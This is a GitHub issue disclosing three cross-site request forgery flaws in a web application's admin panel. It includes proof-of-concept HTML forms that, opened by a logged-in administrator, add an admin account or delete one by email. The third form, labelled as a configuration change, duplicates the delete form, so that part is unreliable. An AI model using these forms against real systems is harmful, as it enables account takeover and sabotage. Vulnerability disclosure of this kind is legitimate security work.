Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is three CSRF vulnerability that can add the administrator account, delete administrator account, edit configuration. #352

Open
piaolin opened this issue Jul 27, 2020 · 0 comments

Comments

@piaolin
Copy link

piaolin commented Jul 27, 2020

After the administrator logged in, open the following three pages:

1. add_admin.html

Add a administrator.

<html>
  <body>
    <form action="http://localhost:8888/admin/configure/users" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="email" value="321@com" />
      <input type="hidden" name="password" value="321" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

2. delete_admin.html

Delete a administrator use username(email), and the param 'id' is not useful, you can delete any user you think username(email).

<html>
  <body>
    <form action="http://10.157.41.81:8888/admin/configure/users/delete" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="id" value="80" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

3. configure.html

It can edit configure, example:

1. Change HTTP Basic Auth User&Password to download a backup of your data via HTTP.
2. Change administrator email and used with add_admin.html.
3. Change Client Secret which is used to validate requests.
<html>
  <body>
    <form action="http://10.157.41.81:8888/admin/configure/users/delete" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="id" value="80" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
@piaolin piaolin changed the title There is three CSRF vulnerability that can add the administrator account There is three CSRF vulnerability that can add the administrator account, delete administrator account, edit configuration. Jul 27, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant